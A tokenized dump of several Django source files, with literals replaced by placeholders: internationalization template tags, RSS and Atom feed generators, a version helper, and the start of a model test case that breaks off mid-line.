variable ] = translation . get_language ( ) <EOL> return '<STR_LIT>' <EOL> class GetCurrentLanguageBidiNode ( Node ) : <EOL> def __init__ ( self , variable ) : <EOL> self . variable = variable <EOL> def render ( self , context ) : <EOL> context [ self . variable ] = translation . get_language_bidi ( ) <EOL> return '<STR_LIT>' <EOL> class TranslateNode ( Node ) : <EOL> def __init__ ( self , filter_expression , noop , asvar = None , <EOL> message_context = None ) : <EOL> self . noop = noop <EOL> self . asvar = asvar <EOL> self . message_context = message_context <EOL> self . filter_expression = filter_expression <EOL> if isinstance ( self . filter_expression . var , six . string_types ) : <EOL> self . filter_expression . var = Variable ( "<STR_LIT>" % <EOL> self . filter_expression . var ) <EOL> def render ( self , context ) : <EOL> self . filter_expression . var . translate = not self . noop <EOL> if self . message_context : <EOL> self . filter_expression . var . message_context = ( <EOL> self . message_context . resolve ( context ) ) <EOL> output = self . filter_expression . resolve ( context ) <EOL> value = _render_value_in_context ( output , context ) <EOL> if self . asvar : <EOL> context [ self . asvar ] = value <EOL> return '<STR_LIT>' <EOL> else : <EOL> return value <EOL> class BlockTranslateNode ( Node ) : <EOL> def __init__ ( self , extra_context , singular , plural = None , countervar = None , <EOL> counter = None , message_context = None ) : <EOL> self . extra_context = extra_context <EOL> self . singular = singular <EOL> self . plural = plural <EOL> self . countervar = countervar <EOL> self . counter = counter <EOL> self . message_context = message_context <EOL> def render_token_list ( self , tokens ) : <EOL> result = [ ] <EOL> vars = [ ] <EOL> for token in tokens : <EOL> if token . token_type == TOKEN_TEXT : <EOL> result . append ( token . contents . replace ( '<STR_LIT:%>' , '<STR_LIT>' ) ) <EOL> elif token . token_type == TOKEN_VAR : <EOL> result . 
append ( '<STR_LIT>' % token . contents ) <EOL> vars . append ( token . contents ) <EOL> return '<STR_LIT>' . join ( result ) , vars <EOL> def render ( self , context , nested = False ) : <EOL> if self . message_context : <EOL> message_context = self . message_context . resolve ( context ) <EOL> else : <EOL> message_context = None <EOL> tmp_context = { } <EOL> for var , val in self . extra_context . items ( ) : <EOL> tmp_context [ var ] = val . resolve ( context ) <EOL> context . update ( tmp_context ) <EOL> singular , vars = self . render_token_list ( self . singular ) <EOL> if self . plural and self . countervar and self . counter : <EOL> count = self . counter . resolve ( context ) <EOL> context [ self . countervar ] = count <EOL> plural , plural_vars = self . render_token_list ( self . plural ) <EOL> if message_context : <EOL> result = translation . npgettext ( message_context , singular , <EOL> plural , count ) <EOL> else : <EOL> result = translation . ungettext ( singular , plural , count ) <EOL> vars . extend ( plural_vars ) <EOL> else : <EOL> if message_context : <EOL> result = translation . pgettext ( message_context , singular ) <EOL> else : <EOL> result = translation . ugettext ( singular ) <EOL> data = dict ( [ ( v , _render_value_in_context ( context . get ( v , '<STR_LIT>' ) , context ) ) for v in vars ] ) <EOL> context . pop ( ) <EOL> try : <EOL> result = result % data <EOL> except ( KeyError , ValueError ) : <EOL> if nested : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( result , data ) ) <EOL> with translation . override ( None ) : <EOL> result = self . render ( context , nested = True ) <EOL> return result <EOL> class LanguageNode ( Node ) : <EOL> def __init__ ( self , nodelist , language ) : <EOL> self . nodelist = nodelist <EOL> self . language = language <EOL> def render ( self , context ) : <EOL> with translation . override ( self . language . resolve ( context ) ) : <EOL> output = self . nodelist . 
render ( context ) <EOL> return output <EOL> @ register . tag ( "<STR_LIT>" ) <EOL> def do_get_available_languages ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> args = token . contents . split ( ) <EOL> if len ( args ) != <NUM_LIT:3> or args [ <NUM_LIT:1> ] != '<STR_LIT>' : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" % args ) <EOL> return GetAvailableLanguagesNode ( args [ <NUM_LIT:2> ] ) <EOL> @ register . tag ( "<STR_LIT>" ) <EOL> def do_get_language_info ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> args = token . contents . split ( ) <EOL> if len ( args ) != <NUM_LIT:5> or args [ <NUM_LIT:1> ] != '<STR_LIT>' or args [ <NUM_LIT:3> ] != '<STR_LIT>' : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" % ( args [ <NUM_LIT:0> ] , args [ <NUM_LIT:1> : ] ) ) <EOL> return GetLanguageInfoNode ( args [ <NUM_LIT:2> ] , args [ <NUM_LIT:4> ] ) <EOL> @ register . tag ( "<STR_LIT>" ) <EOL> def do_get_language_info_list ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> args = token . contents . split ( ) <EOL> if len ( args ) != <NUM_LIT:5> or args [ <NUM_LIT:1> ] != '<STR_LIT>' or args [ <NUM_LIT:3> ] != '<STR_LIT>' : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" % ( args [ <NUM_LIT:0> ] , args [ <NUM_LIT:1> : ] ) ) <EOL> return GetLanguageInfoListNode ( args [ <NUM_LIT:2> ] , args [ <NUM_LIT:4> ] ) <EOL> @ register . filter <EOL> def language_name ( lang_code ) : <EOL> return translation . get_language_info ( lang_code ) [ '<STR_LIT:name>' ] <EOL> @ register . filter <EOL> def language_name_local ( lang_code ) : <EOL> return translation . get_language_info ( lang_code ) [ '<STR_LIT>' ] <EOL> @ register . filter <EOL> def language_bidi ( lang_code ) : <EOL> return translation . get_language_info ( lang_code ) [ '<STR_LIT>' ] <EOL> @ register . tag ( "<STR_LIT>" ) <EOL> def do_get_current_language ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> args = token . contents . 
split ( ) <EOL> if len ( args ) != <NUM_LIT:3> or args [ <NUM_LIT:1> ] != '<STR_LIT>' : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" % args ) <EOL> return GetCurrentLanguageNode ( args [ <NUM_LIT:2> ] ) <EOL> @ register . tag ( "<STR_LIT>" ) <EOL> def do_get_current_language_bidi ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> args = token . contents . split ( ) <EOL> if len ( args ) != <NUM_LIT:3> or args [ <NUM_LIT:1> ] != '<STR_LIT>' : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" % args ) <EOL> return GetCurrentLanguageBidiNode ( args [ <NUM_LIT:2> ] ) <EOL> @ register . tag ( "<STR_LIT>" ) <EOL> def do_translate ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> class TranslateParser ( TokenParser ) : <EOL> def top ( self ) : <EOL> value = self . value ( ) <EOL> if value [ <NUM_LIT:0> ] == "<STR_LIT:'>" : <EOL> m = re . match ( "<STR_LIT>" , value ) <EOL> if m : <EOL> value = '<STR_LIT>' % ( m . group ( <NUM_LIT:1> ) . replace ( '<STR_LIT:">' , '<STR_LIT>' ) , m . group ( <NUM_LIT:2> ) ) <EOL> elif value [ - <NUM_LIT:1> ] == "<STR_LIT:'>" : <EOL> value = '<STR_LIT>' % value [ <NUM_LIT:1> : - <NUM_LIT:1> ] . replace ( '<STR_LIT:">' , '<STR_LIT>' ) <EOL> noop = False <EOL> asvar = None <EOL> message_context = None <EOL> while self . more ( ) : <EOL> tag = self . tag ( ) <EOL> if tag == '<STR_LIT>' : <EOL> noop = True <EOL> elif tag == '<STR_LIT>' : <EOL> message_context = parser . compile_filter ( self . value ( ) ) <EOL> elif tag == '<STR_LIT>' : <EOL> asvar = self . tag ( ) <EOL> else : <EOL> raise TemplateSyntaxError ( <EOL> "<STR_LIT>" "<STR_LIT>" ) <EOL> return value , noop , asvar , message_context <EOL> value , noop , asvar , message_context = TranslateParser ( token . contents ) . top ( ) <EOL> return TranslateNode ( parser . compile_filter ( value ) , noop , asvar , <EOL> message_context ) <EOL> @ register . tag ( "<STR_LIT>" ) <EOL> def do_block_translate ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> bits = token . 
split_contents ( ) <EOL> options = { } <EOL> remaining_bits = bits [ <NUM_LIT:1> : ] <EOL> while remaining_bits : <EOL> option = remaining_bits . pop ( <NUM_LIT:0> ) <EOL> if option in options : <EOL> raise TemplateSyntaxError ( '<STR_LIT>' <EOL> '<STR_LIT>' % option ) <EOL> if option == '<STR_LIT>' : <EOL> value = token_kwargs ( remaining_bits , parser , support_legacy = True ) <EOL> if not value : <EOL> raise TemplateSyntaxError ( '<STR_LIT>' <EOL> '<STR_LIT>' % bits [ <NUM_LIT:0> ] ) <EOL> elif option == '<STR_LIT:count>' : <EOL> value = token_kwargs ( remaining_bits , parser , support_legacy = True ) <EOL> if len ( value ) != <NUM_LIT:1> : <EOL> raise TemplateSyntaxError ( '<STR_LIT>' <EOL> '<STR_LIT>' % bits [ <NUM_LIT:0> ] ) <EOL> elif option == "<STR_LIT>" : <EOL> try : <EOL> value = remaining_bits . pop ( <NUM_LIT:0> ) <EOL> value = parser . compile_filter ( value ) <EOL> except Exception : <EOL> raise TemplateSyntaxError ( '<STR_LIT>' <EOL> '<STR_LIT>' % bits [ <NUM_LIT:0> ] ) <EOL> else : <EOL> raise TemplateSyntaxError ( '<STR_LIT>' % <EOL> ( bits [ <NUM_LIT:0> ] , option ) ) <EOL> options [ option ] = value <EOL> if '<STR_LIT:count>' in options : <EOL> countervar , counter = list ( six . iteritems ( options [ '<STR_LIT:count>' ] ) ) [ <NUM_LIT:0> ] <EOL> else : <EOL> countervar , counter = None , None <EOL> if '<STR_LIT>' in options : <EOL> message_context = options [ '<STR_LIT>' ] <EOL> else : <EOL> message_context = None <EOL> extra_context = options . get ( '<STR_LIT>' , { } ) <EOL> singular = [ ] <EOL> plural = [ ] <EOL> while parser . tokens : <EOL> token = parser . next_token ( ) <EOL> if token . token_type in ( TOKEN_VAR , TOKEN_TEXT ) : <EOL> singular . append ( token ) <EOL> else : <EOL> break <EOL> if countervar and counter : <EOL> if token . contents . strip ( ) != '<STR_LIT>' : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" ) <EOL> while parser . tokens : <EOL> token = parser . next_token ( ) <EOL> if token . 
token_type in ( TOKEN_VAR , TOKEN_TEXT ) : <EOL> plural . append ( token ) <EOL> else : <EOL> break <EOL> if token . contents . strip ( ) != '<STR_LIT>' : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" % token . contents ) <EOL> return BlockTranslateNode ( extra_context , singular , plural , countervar , <EOL> counter , message_context ) <EOL> @ register . tag <EOL> def language ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> bits = token . split_contents ( ) <EOL> if len ( bits ) != <NUM_LIT:2> : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" % bits [ <NUM_LIT:0> ] ) <EOL> language = parser . compile_filter ( bits [ <NUM_LIT:1> ] ) <EOL> nodelist = parser . parse ( ( '<STR_LIT>' , ) ) <EOL> parser . delete_first_token ( ) <EOL> return LanguageNode ( nodelist , language ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> import datetime <EOL> try : <EOL> from urllib . parse import urlparse <EOL> except ImportError : <EOL> from urlparse import urlparse <EOL> from django . utils . xmlutils import SimplerXMLGenerator <EOL> from django . utils . encoding import force_text , iri_to_uri <EOL> from django . utils import datetime_safe <EOL> from django . utils import six <EOL> from django . utils . six import StringIO <EOL> from django . utils . timezone import is_aware <EOL> def rfc2822_date ( date ) : <EOL> months = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , ) <EOL> days = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> date = datetime_safe . new_datetime ( date ) <EOL> dow = days [ date . weekday ( ) ] <EOL> month = months [ date . month - <NUM_LIT:1> ] <EOL> time_str = date . strftime ( '<STR_LIT>' % ( dow , month ) ) <EOL> if not six . PY3 : <EOL> time_str = time_str . decode ( '<STR_LIT:utf-8>' ) <EOL> if is_aware ( date ) : <EOL> offset = date . tzinfo . utcoffset ( date ) <EOL> timezone = ( offset . days * <NUM_LIT> * <NUM_LIT> ) + ( offset . seconds // <NUM_LIT> ) <EOL> hour , minute = divmod ( timezone , <NUM_LIT> ) <EOL> return time_str + '<STR_LIT>' % ( hour , minute ) <EOL> else : <EOL> return time_str + '<STR_LIT>' <EOL> def rfc3339_date ( date ) : <EOL> date = datetime_safe . new_datetime ( date ) <EOL> time_str = date . strftime ( '<STR_LIT>' ) <EOL> if not six . PY3 : <EOL> time_str = time_str . decode ( '<STR_LIT:utf-8>' ) <EOL> if is_aware ( date ) : <EOL> offset = date . tzinfo . utcoffset ( date ) <EOL> timezone = ( offset . days * <NUM_LIT> * <NUM_LIT> ) + ( offset . 
seconds // <NUM_LIT> ) <EOL> hour , minute = divmod ( timezone , <NUM_LIT> ) <EOL> return time_str + '<STR_LIT>' % ( hour , minute ) <EOL> else : <EOL> return time_str + '<STR_LIT>' <EOL> def get_tag_uri ( url , date ) : <EOL> """<STR_LIT>""" <EOL> bits = urlparse ( url ) <EOL> d = '<STR_LIT>' <EOL> if date is not None : <EOL> d = '<STR_LIT>' % datetime_safe . new_datetime ( date ) . strftime ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' % ( bits . hostname , d , bits . path , bits . fragment ) <EOL> class SyndicationFeed ( object ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , title , link , description , language = None , author_email = None , <EOL> author_name = None , author_link = None , subtitle = None , categories = None , <EOL> feed_url = None , feed_copyright = None , feed_guid = None , ttl = None , ** kwargs ) : <EOL> to_unicode = lambda s : force_text ( s , strings_only = True ) <EOL> if categories : <EOL> categories = [ force_text ( c ) for c in categories ] <EOL> if ttl is not None : <EOL> ttl = force_text ( ttl ) <EOL> self . feed = { <EOL> '<STR_LIT:title>' : to_unicode ( title ) , <EOL> '<STR_LIT>' : iri_to_uri ( link ) , <EOL> '<STR_LIT:description>' : to_unicode ( description ) , <EOL> '<STR_LIT>' : to_unicode ( language ) , <EOL> '<STR_LIT>' : to_unicode ( author_email ) , <EOL> '<STR_LIT>' : to_unicode ( author_name ) , <EOL> '<STR_LIT>' : iri_to_uri ( author_link ) , <EOL> '<STR_LIT>' : to_unicode ( subtitle ) , <EOL> '<STR_LIT>' : categories or ( ) , <EOL> '<STR_LIT>' : iri_to_uri ( feed_url ) , <EOL> '<STR_LIT>' : to_unicode ( feed_copyright ) , <EOL> '<STR_LIT:id>' : feed_guid or link , <EOL> '<STR_LIT>' : ttl , <EOL> } <EOL> self . feed . update ( kwargs ) <EOL> self . 
items = [ ] <EOL> def add_item ( self , title , link , description , author_email = None , <EOL> author_name = None , author_link = None , pubdate = None , comments = None , <EOL> unique_id = None , enclosure = None , categories = ( ) , item_copyright = None , <EOL> ttl = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> to_unicode = lambda s : force_text ( s , strings_only = True ) <EOL> if categories : <EOL> categories = [ to_unicode ( c ) for c in categories ] <EOL> if ttl is not None : <EOL> ttl = force_text ( ttl ) <EOL> item = { <EOL> '<STR_LIT:title>' : to_unicode ( title ) , <EOL> '<STR_LIT>' : iri_to_uri ( link ) , <EOL> '<STR_LIT:description>' : to_unicode ( description ) , <EOL> '<STR_LIT>' : to_unicode ( author_email ) , <EOL> '<STR_LIT>' : to_unicode ( author_name ) , <EOL> '<STR_LIT>' : iri_to_uri ( author_link ) , <EOL> '<STR_LIT>' : pubdate , <EOL> '<STR_LIT>' : to_unicode ( comments ) , <EOL> '<STR_LIT>' : to_unicode ( unique_id ) , <EOL> '<STR_LIT>' : enclosure , <EOL> '<STR_LIT>' : categories or ( ) , <EOL> '<STR_LIT>' : to_unicode ( item_copyright ) , <EOL> '<STR_LIT>' : ttl , <EOL> } <EOL> item . update ( kwargs ) <EOL> self . items . append ( item ) <EOL> def num_items ( self ) : <EOL> return len ( self . items ) <EOL> def root_attributes ( self ) : <EOL> """<STR_LIT>""" <EOL> return { } <EOL> def add_root_elements ( self , handler ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def item_attributes ( self , item ) : <EOL> """<STR_LIT>""" <EOL> return { } <EOL> def add_item_elements ( self , handler , item ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def write ( self , outfile , encoding ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def writeString ( self , encoding ) : <EOL> """<STR_LIT>""" <EOL> s = StringIO ( ) <EOL> self . write ( s , encoding ) <EOL> return s . getvalue ( ) <EOL> def latest_post_date ( self ) : <EOL> """<STR_LIT>""" <EOL> updates = [ i [ '<STR_LIT>' ] for i in self . 
items if i [ '<STR_LIT>' ] is not None ] <EOL> if len ( updates ) > <NUM_LIT:0> : <EOL> updates . sort ( ) <EOL> return updates [ - <NUM_LIT:1> ] <EOL> else : <EOL> return datetime . datetime . now ( ) <EOL> class Enclosure ( object ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , url , length , mime_type ) : <EOL> "<STR_LIT>" <EOL> self . length , self . mime_type = length , mime_type <EOL> self . url = iri_to_uri ( url ) <EOL> class RssFeed ( SyndicationFeed ) : <EOL> mime_type = '<STR_LIT>' <EOL> def write ( self , outfile , encoding ) : <EOL> handler = SimplerXMLGenerator ( outfile , encoding ) <EOL> handler . startDocument ( ) <EOL> handler . startElement ( "<STR_LIT>" , self . rss_attributes ( ) ) <EOL> handler . startElement ( "<STR_LIT>" , self . root_attributes ( ) ) <EOL> self . add_root_elements ( handler ) <EOL> self . write_items ( handler ) <EOL> self . endChannelElement ( handler ) <EOL> handler . endElement ( "<STR_LIT>" ) <EOL> def rss_attributes ( self ) : <EOL> return { "<STR_LIT:version>" : self . _version , <EOL> "<STR_LIT>" : "<STR_LIT>" } <EOL> def write_items ( self , handler ) : <EOL> for item in self . items : <EOL> handler . startElement ( '<STR_LIT>' , self . item_attributes ( item ) ) <EOL> self . add_item_elements ( handler , item ) <EOL> handler . endElement ( "<STR_LIT>" ) <EOL> def add_root_elements ( self , handler ) : <EOL> handler . addQuickElement ( "<STR_LIT:title>" , self . feed [ '<STR_LIT:title>' ] ) <EOL> handler . addQuickElement ( "<STR_LIT>" , self . feed [ '<STR_LIT>' ] ) <EOL> handler . addQuickElement ( "<STR_LIT:description>" , self . feed [ '<STR_LIT:description>' ] ) <EOL> if self . feed [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , None , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : self . feed [ '<STR_LIT>' ] } ) <EOL> if self . feed [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , self . feed [ '<STR_LIT>' ] ) <EOL> for cat in self . 
feed [ '<STR_LIT>' ] : <EOL> handler . addQuickElement ( "<STR_LIT>" , cat ) <EOL> if self . feed [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , self . feed [ '<STR_LIT>' ] ) <EOL> handler . addQuickElement ( "<STR_LIT>" , rfc2822_date ( self . latest_post_date ( ) ) ) <EOL> if self . feed [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , self . feed [ '<STR_LIT>' ] ) <EOL> def endChannelElement ( self , handler ) : <EOL> handler . endElement ( "<STR_LIT>" ) <EOL> class RssUserland091Feed ( RssFeed ) : <EOL> _version = "<STR_LIT>" <EOL> def add_item_elements ( self , handler , item ) : <EOL> handler . addQuickElement ( "<STR_LIT:title>" , item [ '<STR_LIT:title>' ] ) <EOL> handler . addQuickElement ( "<STR_LIT>" , item [ '<STR_LIT>' ] ) <EOL> if item [ '<STR_LIT:description>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT:description>" , item [ '<STR_LIT:description>' ] ) <EOL> class Rss201rev2Feed ( RssFeed ) : <EOL> _version = "<STR_LIT>" <EOL> def add_item_elements ( self , handler , item ) : <EOL> handler . addQuickElement ( "<STR_LIT:title>" , item [ '<STR_LIT:title>' ] ) <EOL> handler . addQuickElement ( "<STR_LIT>" , item [ '<STR_LIT>' ] ) <EOL> if item [ '<STR_LIT:description>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT:description>" , item [ '<STR_LIT:description>' ] ) <EOL> if item [ "<STR_LIT>" ] and item [ "<STR_LIT>" ] : <EOL> handler . addQuickElement ( "<STR_LIT>" , "<STR_LIT>" % ( item [ '<STR_LIT>' ] , item [ '<STR_LIT>' ] ) ) <EOL> elif item [ "<STR_LIT>" ] : <EOL> handler . addQuickElement ( "<STR_LIT>" , item [ "<STR_LIT>" ] ) <EOL> elif item [ "<STR_LIT>" ] : <EOL> handler . addQuickElement ( "<STR_LIT>" , item [ "<STR_LIT>" ] , { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> if item [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , rfc2822_date ( item [ '<STR_LIT>' ] ) ) <EOL> if item [ '<STR_LIT>' ] is not None : <EOL> handler . 
addQuickElement ( "<STR_LIT>" , item [ '<STR_LIT>' ] ) <EOL> if item [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , item [ '<STR_LIT>' ] ) <EOL> if item [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , item [ '<STR_LIT>' ] ) <EOL> if item [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , '<STR_LIT>' , <EOL> { "<STR_LIT:url>" : item [ '<STR_LIT>' ] . url , "<STR_LIT>" : item [ '<STR_LIT>' ] . length , <EOL> "<STR_LIT:type>" : item [ '<STR_LIT>' ] . mime_type } ) <EOL> for cat in item [ '<STR_LIT>' ] : <EOL> handler . addQuickElement ( "<STR_LIT>" , cat ) <EOL> class Atom1Feed ( SyndicationFeed ) : <EOL> mime_type = '<STR_LIT>' <EOL> ns = "<STR_LIT>" <EOL> def write ( self , outfile , encoding ) : <EOL> handler = SimplerXMLGenerator ( outfile , encoding ) <EOL> handler . startDocument ( ) <EOL> handler . startElement ( '<STR_LIT>' , self . root_attributes ( ) ) <EOL> self . add_root_elements ( handler ) <EOL> self . write_items ( handler ) <EOL> handler . endElement ( "<STR_LIT>" ) <EOL> def root_attributes ( self ) : <EOL> if self . feed [ '<STR_LIT>' ] is not None : <EOL> return { "<STR_LIT>" : self . ns , "<STR_LIT>" : self . feed [ '<STR_LIT>' ] } <EOL> else : <EOL> return { "<STR_LIT>" : self . ns } <EOL> def add_root_elements ( self , handler ) : <EOL> handler . addQuickElement ( "<STR_LIT:title>" , self . feed [ '<STR_LIT:title>' ] ) <EOL> handler . addQuickElement ( "<STR_LIT>" , "<STR_LIT>" , { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : self . feed [ '<STR_LIT>' ] } ) <EOL> if self . feed [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , "<STR_LIT>" , { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : self . feed [ '<STR_LIT>' ] } ) <EOL> handler . addQuickElement ( "<STR_LIT:id>" , self . feed [ '<STR_LIT:id>' ] ) <EOL> handler . addQuickElement ( "<STR_LIT>" , rfc3339_date ( self . latest_post_date ( ) ) ) <EOL> if self . 
feed [ '<STR_LIT>' ] is not None : <EOL> handler . startElement ( "<STR_LIT>" , { } ) <EOL> handler . addQuickElement ( "<STR_LIT:name>" , self . feed [ '<STR_LIT>' ] ) <EOL> if self . feed [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT:email>" , self . feed [ '<STR_LIT>' ] ) <EOL> if self . feed [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , self . feed [ '<STR_LIT>' ] ) <EOL> handler . endElement ( "<STR_LIT>" ) <EOL> if self . feed [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , self . feed [ '<STR_LIT>' ] ) <EOL> for cat in self . feed [ '<STR_LIT>' ] : <EOL> handler . addQuickElement ( "<STR_LIT>" , "<STR_LIT>" , { "<STR_LIT>" : cat } ) <EOL> if self . feed [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , self . feed [ '<STR_LIT>' ] ) <EOL> def write_items ( self , handler ) : <EOL> for item in self . items : <EOL> handler . startElement ( "<STR_LIT>" , self . item_attributes ( item ) ) <EOL> self . add_item_elements ( handler , item ) <EOL> handler . endElement ( "<STR_LIT>" ) <EOL> def add_item_elements ( self , handler , item ) : <EOL> handler . addQuickElement ( "<STR_LIT:title>" , item [ '<STR_LIT:title>' ] ) <EOL> handler . addQuickElement ( "<STR_LIT>" , "<STR_LIT>" , { "<STR_LIT>" : item [ '<STR_LIT>' ] , "<STR_LIT>" : "<STR_LIT>" } ) <EOL> if item [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , rfc3339_date ( item [ '<STR_LIT>' ] ) ) <EOL> if item [ '<STR_LIT>' ] is not None : <EOL> handler . startElement ( "<STR_LIT>" , { } ) <EOL> handler . addQuickElement ( "<STR_LIT:name>" , item [ '<STR_LIT>' ] ) <EOL> if item [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT:email>" , item [ '<STR_LIT>' ] ) <EOL> if item [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , item [ '<STR_LIT>' ] ) <EOL> handler . 
endElement ( "<STR_LIT>" ) <EOL> if item [ '<STR_LIT>' ] is not None : <EOL> unique_id = item [ '<STR_LIT>' ] <EOL> else : <EOL> unique_id = get_tag_uri ( item [ '<STR_LIT>' ] , item [ '<STR_LIT>' ] ) <EOL> handler . addQuickElement ( "<STR_LIT:id>" , unique_id ) <EOL> if item [ '<STR_LIT:description>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , item [ '<STR_LIT:description>' ] , { "<STR_LIT:type>" : "<STR_LIT:html>" } ) <EOL> if item [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , '<STR_LIT>' , <EOL> { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : item [ '<STR_LIT>' ] . url , <EOL> "<STR_LIT>" : item [ '<STR_LIT>' ] . length , <EOL> "<STR_LIT:type>" : item [ '<STR_LIT>' ] . mime_type } ) <EOL> for cat in item [ '<STR_LIT>' ] : <EOL> handler . addQuickElement ( "<STR_LIT>" , "<STR_LIT>" , { "<STR_LIT>" : cat } ) <EOL> if item [ '<STR_LIT>' ] is not None : <EOL> handler . addQuickElement ( "<STR_LIT>" , item [ '<STR_LIT>' ] ) <EOL> DefaultFeed = Rss201rev2Feed </s>
<s> from __future__ import unicode_literals <EOL> import datetime <EOL> import os <EOL> import subprocess <EOL> def get_version ( version = None ) : <EOL> "<STR_LIT>" <EOL> if version is None : <EOL> from django import VERSION as version <EOL> else : <EOL> assert len ( version ) == <NUM_LIT:5> <EOL> assert version [ <NUM_LIT:3> ] in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> parts = <NUM_LIT:2> if version [ <NUM_LIT:2> ] == <NUM_LIT:0> else <NUM_LIT:3> <EOL> main = '<STR_LIT:.>' . join ( str ( x ) for x in version [ : parts ] ) <EOL> sub = '<STR_LIT>' <EOL> if version [ <NUM_LIT:3> ] == '<STR_LIT>' and version [ <NUM_LIT:4> ] == <NUM_LIT:0> : <EOL> git_changeset = get_git_changeset ( ) <EOL> if git_changeset : <EOL> sub = '<STR_LIT>' % git_changeset <EOL> elif version [ <NUM_LIT:3> ] != '<STR_LIT>' : <EOL> mapping = { '<STR_LIT>' : '<STR_LIT:a>' , '<STR_LIT>' : '<STR_LIT:b>' , '<STR_LIT>' : '<STR_LIT:c>' } <EOL> sub = mapping [ version [ <NUM_LIT:3> ] ] + str ( version [ <NUM_LIT:4> ] ) <EOL> return str ( main + sub ) <EOL> def get_git_changeset ( ) : <EOL> """<STR_LIT>""" <EOL> repo_dir = os . path . dirname ( os . path . dirname ( os . path . abspath ( __file__ ) ) ) <EOL> git_log = subprocess . Popen ( '<STR_LIT>' , <EOL> stdout = subprocess . PIPE , stderr = subprocess . PIPE , <EOL> shell = True , cwd = repo_dir , universal_newlines = True ) <EOL> timestamp = git_log . communicate ( ) [ <NUM_LIT:0> ] <EOL> try : <EOL> timestamp = datetime . datetime . utcfromtimestamp ( int ( timestamp ) ) <EOL> except ValueError : <EOL> return None <EOL> return timestamp . strftime ( '<STR_LIT>' ) </s>
<s> from __future__ import absolute_import <EOL> from django . core . exceptions import FieldError <EOL> from django . test import TestCase <EOL> from django . utils import six <EOL> from . models import Author , Article <EOL> class CustomColumnsTests ( TestCase ) : <EOL> def test_db_column ( self ) : <EOL> a1 = Author . objects . create ( first_name = "<STR_LIT>" , last_name = "<STR_LIT>" ) <EOL> a2 = Author . objects . create ( first_name = "<STR_LIT>" , last_name = "<STR_LIT>" ) <EOL> art = Article . objects . create ( headline = "<STR_LIT>" ) <EOL> art . authors = [ a1 , a2 ] <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . all ( ) , [ <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> ] , <EOL> six . text_type <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Author . objects . filter ( first_name__exact = "<STR_LIT>" ) , [ <EOL> "<STR_LIT>" , <EOL> ] , <EOL> six . text_type <EOL> ) <EOL> self . assertEqual ( <EOL> Author . objects . get ( first_name__exact = "<STR_LIT>" ) , <EOL> a1 , <EOL> ) <EOL> self . assertRaises ( FieldError , <EOL> lambda : Author . objects . filter ( firstname__exact = "<STR_LIT>" ) <EOL> ) <EOL> a = Author . objects . get ( last_name__exact = "<STR_LIT>" ) <EOL> a . first_name = 